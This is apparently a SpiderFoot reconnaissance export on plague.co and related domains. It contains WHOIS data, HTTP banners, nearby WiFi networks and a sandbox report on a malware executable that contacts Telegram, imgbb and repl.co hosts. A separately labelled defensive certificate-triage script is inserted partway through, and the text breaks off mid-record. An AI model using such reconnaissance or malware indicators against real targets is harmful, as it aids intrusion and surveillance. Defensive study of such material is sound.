FOR PRIVACY Registrant State/Province: Arizona Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: ns53.domaincontrol.com Name Server: ns54.domaincontrol.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:11:07Z <<< For more information on Whois status codes, please visit https://icann.org/epp The above WHOIS results have been redacted to remove potential personal data. The full WHOIS output may be available to individuals and organisations with a legitimate interest in accessing this data not outweighed by the fundamental privacy rights of the data subject. 
To find out more, or to make a request for access, please visit: RDDSrequest.nic.co. .CO Internet, S.A.S., the Administrator for .CO, has collected this information for the WHOIS database through Accredited Registrars. This information is provided to you for informational purposes only and is designed to assist persons in determining contents of a domain name registration record in the .CO Internet registry database. .CO Internet makes this information available to you "as is" and does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data: (1) to allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone; (2) in contravention of any applicable data and privacy protection laws; or (3) to enable high volume, automated, electronic processes that apply to the registry (or its systems). Compilation, repackaging, dissemination, or other use of the WHOIS database in its entirety, or of a substantial portion thereof, is not allowed without .CO Internet's prior written permission. .CO Internet reserves the right to modify or change these conditions at any time without prior or subsequent notification of any kind. By executing this query, in any manner whatsoever, you agree to abide by these terms. In some limited cases, domains that might appear as available in whois might not actually be available as they could be already registered and the whois not yet updated and/or they could be part of the Restricted list. In this cases, performing a check through your Registrar's (EPP check) will give you the actual status of the domain. Additionally, domains currently or previously used as extensions in 3rd level domains will not be available for registration in the 2nd level. 
For example, org.co, mil.co, edu.co, com.co, net.co, nom.co, arts.co, firm.co, info.co, int.co, web.co, rec.co, co.co. NOTE: FAILURE TO LOCATE A RECORD IN THE WHOIS DATABASE IS NOT INDICATIVE OF THE AVAILABILITY OF A DOMAIN NAME. All domain names are subject to certain additional domain name registration rules. For details, please visit our site at www.cointernet.co . Domain Name: plague.co Registry Domain ID: D4A395B67AB204CFAABA57C93F6BB05A4-NSR Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-05-31T11:58:48Z Creation Date: 2018-05-30T17:52:58Z Registrar Registration Expiration Date: 2023-05-30T17:52:58Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: CR440372327 Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.co Registry Admin ID: CR440372329 Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 
Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.co Registry Tech ID: CR440372328 Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.co Name Server: NS53.DOMAINCONTROL.COM Name Server: NS54.DOMAINCONTROL.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:11:08Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. 
Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. 2022-12-18 00:20:16 Netblock Membership No RIPE 0 0 3 0 None 90.116.0.0/16 90.116.149.183 2022-12-18 00:18:28 IP Address No DNS Resolver 22 0 2 0 None 81.88.48.102 webmail.zerotwo-best-waifu.online 2022-12-18 00:09:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.0:443 188.114.96.0/24 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77af968c6fa22d82-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.7.179 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None WaveLAN Network VHome2B (Net ID: 00:02:2D:03:03:11) 37.7803446,-122.3906132 2022-12-18 00:03:29 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3225.webapps.net 81.88.52.225 2022-12-18 00:23:29 Raw DNS Records No DNS Raw Records 0 0 2 0 None autoconfig.zerotwo-best-waifu.online. 359 IN CNAME tb-fr.securemail.pro. 
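The Let's Encrypt certificate attached to the plague.fun record above is the form in which SpiderFoot keeps certificates: the text of "openssl x509 -text", not PEM. When a scan turns up dozens of these, the questions worth answering first are whether the certificate was still valid when the scan observed it, which names it actually covers (a wildcard SAN such as *.plague.fun covers hook.plague.fun but not the apex or a deeper label), and whether it carries Certificate Transparency SCTs. The script below is an added example, not part of the export on this page and not SpiderFoot's own code. It parses the text dump with regular expressions, accepting both the original multi-line layout and the whitespace-collapsed form the export shows; SAMPLE is the *.plague.fun certificate from the page with the key and signature hex omitted, and the observation time is an assumption taken from the export's scan date (2022-12-18 00:00 UTC). The hostname matching follows the RFC 6125 rule that a wildcard matches exactly one leftmost label.

```python
"""Triage an X.509 certificate from an `openssl x509 -text` dump.

Added example: not SpiderFoot code and not part of the page's export.
"""
import re
from datetime import datetime, timezone

# Sample constructed from the *.plague.fun certificate on the page (hex omitted).
SAMPLE = """Certificate:
    Data:
        Serial Number:
            04:54:d1:cf:73:f4:06:da:67:36:31:1b:04:19:11:b7:02:21
        Signature Algorithm: ecdsa-with-SHA384
        Issuer: C=US, O=Let's Encrypt, CN=E1
        Validity
            Not Before: Mar  8 17:41:57 2022 GMT
            Not After : Jun  6 17:41:56 2022 GMT
        Subject: CN=*.plague.fun
        Subject Public Key Info:
            Public Key Algorithm: id-ecPublicKey
                Public-Key: (256 bit)
        X509v3 extensions:
            X509v3 Basic Constraints: critical
                CA:FALSE
            X509v3 Subject Alternative Name:
                DNS:*.plague.fun, DNS:plague.fun
            CT Precertificate SCTs:
                Signed Certificate Timestamp:
                    Timestamp : Mar  8 18:41:57.493 2022 GMT
                Signed Certificate Timestamp:
                    Timestamp : Mar  8 18:41:57.948 2022 GMT
"""

SCAN_TIME = datetime(2022, 12, 18, tzinfo=timezone.utc)  # assumed: export's scan date
_TIME = r"([A-Z][a-z]{2}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2}\s+\d{4})\s+GMT"
_SAN_LIST = r"Subject Alternative Name:(?:\s*critical)?\s*((?:(?:DNS|IP Address|email|URI):[^,\s]+(?:,\s*)?)+)"


def _when(s):
    """'Jun  6 17:41:56 2022' -> aware UTC datetime; tolerates doubled spaces."""
    return datetime.strptime(" ".join(s.split()), "%b %d %H:%M:%S %Y").replace(tzinfo=timezone.utc)


def _grab(pattern, text, default=None):
    m = re.search(pattern, text, re.S)
    return m.group(1).strip() if m else default


def parse_cert_text(text):
    """Extract the triage-relevant fields; works on multi-line or collapsed dumps."""
    return {
        "serial": _grab(r"Serial Number:\s*(\S+)", text),
        "sig_alg": _grab(r"Signature Algorithm:\s*(\S+)", text),
        "issuer": _grab(r"Issuer:\s*(.+?)\s+Validity\b", text),
        "subject": _grab(r"\bSubject:\s*(.+?)\s+Subject Public Key Info", text),
        "key_alg": _grab(r"Public Key Algorithm:\s*(\S+)", text),
        "key_bits": int(_grab(r"Public-Key:\s*\((\d+) bit\)", text, "0")),
        "not_before": _when(_grab(r"Not Before:\s*" + _TIME, text)),
        "not_after": _when(_grab(r"Not After\s*:\s*" + _TIME, text)),
        "sans": re.findall(r"(?:DNS|IP Address|email|URI):([^,\s]+)", _grab(_SAN_LIST, text, "")),
        "is_ca": _grab(r"CA:(TRUE|FALSE)", text, "FALSE") == "TRUE",
        "sct_count": len(re.findall(r"Signed Certificate Timestamp:", text)),
    }


def triage(cert, observed_at=SCAN_TIME):
    """Findings a reviewer wants before chasing the host behind a certificate."""
    findings = []
    if cert["not_after"] < observed_at:
        findings.append(f"expired {(observed_at - cert['not_after']).days} days before observation")
    elif cert["not_before"] > observed_at:
        findings.append("not yet valid at observation time")
    wildcards = [n for n in cert["sans"] if n.startswith("*.")]
    if wildcards:
        findings.append("wildcard names: " + ", ".join(wildcards))
    if cert["key_alg"] == "rsaEncryption" and cert["key_bits"] < 2048:
        findings.append(f"weak RSA key ({cert['key_bits']} bit)")
    if re.search(r"(?i)sha1|md5", cert["sig_alg"] or ""):
        findings.append(f"deprecated signature algorithm {cert['sig_alg']}")
    if cert["sct_count"] == 0:
        findings.append("no embedded SCTs (the cert may still be CT-logged by other means)")
    if cert["is_ca"]:
        findings.append("CA:TRUE on a leaf-looking certificate")
    return findings


def name_matches(pattern, hostname):
    """RFC 6125 style: '*' only as the whole leftmost label, matching exactly one label."""
    pattern, hostname = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if not pattern.startswith("*."):
        return pattern == hostname
    suffix = pattern[1:]  # ".plague.fun"
    if not hostname.endswith(suffix):
        return False
    leftmost = hostname[: -len(suffix)]
    return bool(leftmost) and "." not in leftmost


def covers(cert, hostname):
    """True if any SAN in the parsed certificate matches the hostname."""
    return any(name_matches(n, hostname) for n in cert["sans"])


if __name__ == "__main__":
    cert = parse_cert_text(SAMPLE)
    print(cert["subject"], "issued by", cert["issuer"], "until", cert["not_after"].date())
    for finding in triage(cert):
        print(" -", finding)
    for host in ("hook.plague.fun", "plague.fun", "a.b.plague.fun", "evilplague.fun"):
        print(f"{host}: {'covered' if covers(cert, host) else 'not covered'}")
```

Run against the sample, the triage reports the certificate as expired 194 days before the scan and flags the wildcard name; the name check shows why the apex is only covered because DNS:plague.fun is listed separately and why a two-label prefix is not covered at all. Swap in the Cloudflare "SSL Certificate - Raw Data" dumps from the same export to compare.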
  Source Data: autoconfig.zerotwo-best-waifu.online

2022-12-18 00:21:20 | Open TCP Port Banner | Risky: No | Module: Censys | Children/Correlations/Distance/Starred: 0/0/2/0 | Annotation: None
  Data:
    HTTP/1.1 403 Forbidden
    Date:
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Vary: Accept-Encoding
    Server: cloudflare
    CF-RAY: 77b135839fef2d4c-ORD
    Content-Encoding: gzip
  Source Data: 188.114.97.1

2022-12-18 00:21:27 | Open TCP Port Banner | Risky: No | Module: Censys | Children/Correlations/Distance/Starred: 0/0/2/0 | Annotation: None
  Data:
    HTTP/1.1 403 Forbidden
    Date:
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Vary: Accept-Encoding
    Server: cloudflare
    CF-RAY: 77b25f649e501417-ORD
    Content-Encoding: gzip
  Source Data: 2606:4700:3037::6815:13f3

2022-12-18 00:21:11 | WiFi Access Point Nearby | Risky: No | Module: Wigle.net | Children/Correlations/Distance/Starred: 0/0/5/0 | Annotation: None
  Data: WLAN (Net ID: 00:01:24:F0:97:C1)
  Source Data: 37.780462,-122.390564

2022-12-18 00:31:46 | Similar Domain - Whois | Risky: No | Module: Whois | Children/Correlations/Distance/Starred: 1/0/2/0 | Annotation: None
  Data:
    Domain Name: plague.nyc
    Registry Domain ID: D2449566-NYC
    Registrar WHOIS Server: whois.godaddy.com
    Registrar URL: whois.godaddy.com
    Updated Date: 2022-01-30T13:51:18Z
    Creation Date: 2017-01-25T15:47:03Z
    Registry Expiry Date: 2023-01-24T23:59:59Z
    Registrar: GoDaddy.com, LLC
    Registrar IANA ID: 146
    Registrar Abuse Contact Email: abuse@godaddy.com
    Registrar Abuse Contact Phone: +1.4806242505
    Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
    Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
    Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
    Registry Registrant ID: REDACTED FOR PRIVACY
    Registrant Name: REDACTED FOR PRIVACY
    Registrant Organization: NYSPMA
    Registrant Street: REDACTED FOR PRIVACY
    Registrant Street: REDACTED FOR PRIVACY
    Registrant Street: REDACTED FOR PRIVACY
    Registrant City: REDACTED FOR PRIVACY
    Registrant State/Province: New York
    Registrant Postal Code: REDACTED FOR PRIVACY
    Registrant Country: US
    Registrant Phone: REDACTED FOR PRIVACY
    Registrant Phone Ext: REDACTED FOR PRIVACY
    Registrant Fax: REDACTED FOR PRIVACY
    Registrant Fax Ext: REDACTED FOR PRIVACY
    Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
    Registry Admin ID: REDACTED FOR PRIVACY
    Admin Name: REDACTED FOR PRIVACY
    Admin Organization: REDACTED FOR PRIVACY
    Admin Street: REDACTED FOR PRIVACY
    Admin Street: REDACTED FOR PRIVACY
    Admin Street: REDACTED FOR PRIVACY
    Admin City: REDACTED FOR PRIVACY
    Admin State/Province: REDACTED FOR PRIVACY
    Admin Postal Code: REDACTED FOR PRIVACY
    Admin Country: REDACTED FOR PRIVACY
    Admin Phone: REDACTED FOR PRIVACY
    Admin Phone Ext: REDACTED FOR PRIVACY
    Admin Fax: REDACTED FOR PRIVACY
    Admin Fax Ext: REDACTED FOR PRIVACY
    Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
    Registry Tech ID: REDACTED FOR PRIVACY
    Tech Name: REDACTED FOR PRIVACY
    Tech Organization: REDACTED FOR PRIVACY
    Tech Street: REDACTED FOR PRIVACY
    Tech Street: REDACTED FOR PRIVACY
    Tech Street: REDACTED FOR PRIVACY
    Tech City: REDACTED FOR PRIVACY
    Tech State/Province: REDACTED FOR PRIVACY
    Tech Postal Code: REDACTED FOR PRIVACY
    Tech Country: REDACTED FOR PRIVACY
    Tech Phone: REDACTED FOR PRIVACY
    Tech Phone Ext: REDACTED FOR PRIVACY
    Tech Fax: REDACTED FOR PRIVACY
    Tech Fax Ext: REDACTED FOR PRIVACY
    Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
    Name Server: ns18.domaincontrol.com
    Name Server: ns17.domaincontrol.com
    DNSSEC: unsigned
    nyc ID: C2449551-NYC
    nyc Name: REDACTED FOR PRIVACY
    nyc Organization: REDACTED FOR PRIVACY
    nyc Street: REDACTED FOR PRIVACY
    nyc Street: REDACTED FOR PRIVACY
    nyc Street: REDACTED FOR PRIVACY
    nyc City: REDACTED FOR PRIVACY
    nyc State/Province: REDACTED FOR PRIVACY
    nyc Postal Code: REDACTED FOR PRIVACY
    nyc Country: REDACTED FOR PRIVACY
    nyc Phone: REDACTED FOR PRIVACY
    nyc Phone Ext: REDACTED FOR PRIVACY
    nyc Fax: REDACTED FOR PRIVACY
    nyc Fax Ext: REDACTED FOR PRIVACY
    nyc Email:
    nyc Nexus Category: ORG
    URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
    >>> Last update of WHOIS database: 2022-12-18T00:31:46Z <<<
    For more information on Whois status codes, please visit https://icann.org/epp

    The Service is provided so that you may look up certain information in relation to domain names that we store in our database. Use of the Service is subject to our policies, in particular you should familiarise yourself with our Acceptable Use Policy and our Privacy Policy. The information provided by this Service is 'as is' and we make no guarantee of it its accuracy. You agree that by your use of the Service you will not use the information provided by us in a way which is:
    * inconsistent with any applicable laws,
    * inconsistent with any policy issued by us,
    * to generate, distribute, or facilitate unsolicited mass email, promotions, advertisings or other solicitations, or
    * to enable high volume, automated, electronic processes that apply to the Service.
    You acknowledge that:
    * a response from the Service that a domain name is 'available', does not guarantee that is able to be registered,
    * we may restrict, suspend or terminate your access to the Service at any time, and
    * the copying, compilation, repackaging, dissemination or other use of the information provided by the Service is not permitted, without our express written consent.
    This information has been prepared and published in order to represent administrative and technical management of the TLD. We may discontinue or amend any part or the whole of these Terms of Service from time to time at our absolute discretion.

    Domain Name: plague.nyc
    Registry Domain ID: D2449566-NYC
    Registrar WHOIS Server: whois.godaddy.com
    Registrar URL: https://www.godaddy.com
    Updated Date: 2022-01-25T13:51:19Z
    Creation Date: 2017-01-25T15:47:03Z
    Registrar Registration Expiration Date: 2023-01-24T23:59:59Z
    Registrar: GoDaddy.com, LLC
    Registrar IANA ID: 146
    Registrar Abuse Contact Email: abuse@godaddy.com
    Registrar Abuse Contact Phone: +1.4806242505
    Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
    Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
    Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
    Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
    Registrant Organization: NYSPMA
    Registrant State/Province: New York
    Registrant Country: US
    Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.nyc
    Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.nyc
    Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=plague.nyc
    Name Server: NS17.DOMAINCONTROL.COM
    Name Server: NS18.DOMAINCONTROL.COM
    DNSSEC: unsigned
    URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
    >>> Last update of WHOIS database: 2022-12-18T00:31:46Z <<<
    For more information on Whois status codes, please visit https://icann.org/epp

    TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice.
  Source Data: plague.nyc

2022-12-18 00:21:10 | WiFi Access Point Nearby | Risky: No | Module: Wigle.net | Children/Correlations/Distance/Starred: 0/0/5/0 | Annotation: None
  Data: WestEd (Net ID: 00:02:2D:05:7E:85)
  Source Data: 37.7803446,-122.3906132

2022-12-18 00:09:27 | Open TCP Port | Risky: No | Module: Pulsedive | Children/Correlations/Distance/Starred: 0/0/3/0 | Annotation: None
  Data: 188.114.96.8:80
  Source Data: 188.114.96.0/24

2022-12-18 00:21:11 | WiFi Access Point Nearby | Risky: No | Module: Wigle.net | Children/Correlations/Distance/Starred: 0/0/5/0 | Annotation: None
  Data: BJNPSETUP (Net ID: 00:00:85:F4:1C:9A)
  Source Data: 37.780462,-122.390564

2022-12-18 00:06:15 | Raw Data from RIRs | Risky: No | Module: Hybrid Analysis | Children/Correlations/Distance/Starred: 0/0/2/0 | Annotation: None
  Data (Python repr of the Hybrid Analysis report, as stored by the module):
    [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 8, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'533e42cb330c3b03136edefe566e4925d232e2e3c4cef1c641ed599a69e9c005.exe', u'signatures': [
    {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ip-api.com"'},
    {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server',
u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.imgbb.com"\n "api.telegram.org"\n "ip-api.com"\n "scratchyrelievedcases.ekdje3fk3rkwrj.repl.co"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-80', u'name': u'PE file contains executable sections', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"res2.exe" has an executable section named ".text"\n "pywintypes310.dll" has an executable section named ".text"\n "libcrypto-1_1.dll" has an executable section named ".text"\n "pythoncom310.dll" has an executable section named ".text"\n "python310.dll" has an executable section named ".text"\n "libffi-7.dll" has an executable section named ".text"\n "sqlite3.dll" has an executable section named ".text"\n "vcruntime140.dll" has an executable section named ".text"\n "libssl-1_1.dll" has an executable section named ".text"\n "_elementtree.pyd" has an executable section named ".text"\n "_ghash_clmul.pyd" has an executable section named ".text"\n "_raw_aesni.pyd" has an executable section named ".text"\n "_queue.pyd" has an executable section named ".text"\n "_SHA1.pyd" has an executable section named ".text"\n "select.pyd" has an executable section named ".text"\n "_raw_ctr.pyd" has an executable section named ".text"\n "_sqlite3.pyd" has an executable section named ".text"\n "_hashlib.pyd" has an executable section named ".text"\n "_cpuid_c.pyd" has an executable section named ".text"'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-96', u'name': u'PE file entrypoint instructions', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, 
u'type': 0, u'description': u'"res2.exe" file has an entrypoint instructions - "testal, 0x20,jne0x1400010fe,movr14, qword ptr [rcx + 0x18],andeax, 0xffffff8f,movecx, 0x14,cmpeax, 3,je0x140001900,cmpeax, 0x80,je0x1400018b4,callqword ptr [rip + 0x958828],movr13, rax,xoreax, eax,nopdword ptr [rax],movrdx, qword ptr [r12 + rax*8],addqword ptr [rdx], 1,movqword ptr [r13 + rax*8 + 0x18], rdx,addrax, 1,cmprax, 0x14,jne0x140001128,movrdx, r13,movrcx, r14,callrbx,subqword ptr [r13], 1,movr14, rax,jne0x140000e87,movrcx, r13,"\n "pywintypes310.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x1800028cd,call0x180002c14,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x180002754,int3,int3,int3,jmp0x180002ba0,int3,int3,int3,andqword ptr [rcx + 0x10], 0,learax, [rip + 0xfd10],movqword ptr [rcx], rax,movrax, rcx,movqword ptr [rcx + 8], rdx,ret,int3,pushrbx,"\n "libcrypto-1_1.dll" file has an entrypoint instructions - "jmp0x180245c38,jmp0x180222650,jmp0x180233140,jmp0x1801fc340,jmp0x1801e7430,jmp0x1800a75f0,jmp0x1801b6ff0,jmp0x18019cb20,jmp0x18015d720,jmp0x18019e030,jmp0x1800dfca0,jmp0x1801f7ed0,jmp0x1801b1950,jmp0x18019ca80,jmp0x18010b1e0,jmp0x18021d380,jmp0x1802124e0,jmp0x180234850,jmp0x1801c1060,jmp0x180246130,"\n "pythoncom310.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x18001102d,call0x180011ae4,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x180010eb4,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x4bff3],movrcx, rbx,callqword ptr [rip + 0x4bff2],callqword ptr [rip + 0x4bfdc],movrcx, rax,"\n "python310.dll" file has an entrypoint instructions - 
"movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x18018219d,call0x1801821bc,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x180182048,int3,int3,int3,movqword ptr [rsp + 0x20], rbx,pushrbp,movrbp, rsp,subrsp, 0x20,movrax, qword ptr [rip + 0x260e30],movabsrbx, 0x2b992ddfa232,cmprax, rbx,jne0x180182253,"\n "libffi-7.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], rsi,pushrdi,subrsp, 0x20,movrdi, r8,movebx, edx,movrsi, rcx,cmpedx, 1,jne0x180004a15,call0x180004bb0,movr8, rdi,movedx, ebx,movrcx, rsi,movrbx, qword ptr [rsp + 0x30],movrsi, qword ptr [rsp + 0x38],addrsp, 0x20,poprdi,jmp0x1800048c0,int3,int3,int3,pushrbx,subrsp, 0x20,movrbx, rcx,xorecx, ecx,callqword ptr [rip + 0x1603],movrcx, rbx,callqword ptr [rip + 0x15f2],callqword ptr [rip + 0x15fc],movrcx, rax,"\n "sqlite3.dll" file has an entrypoint instructions - "movqword ptr [rsp + 8], rbx,movqword ptr [rsp + 0x10], 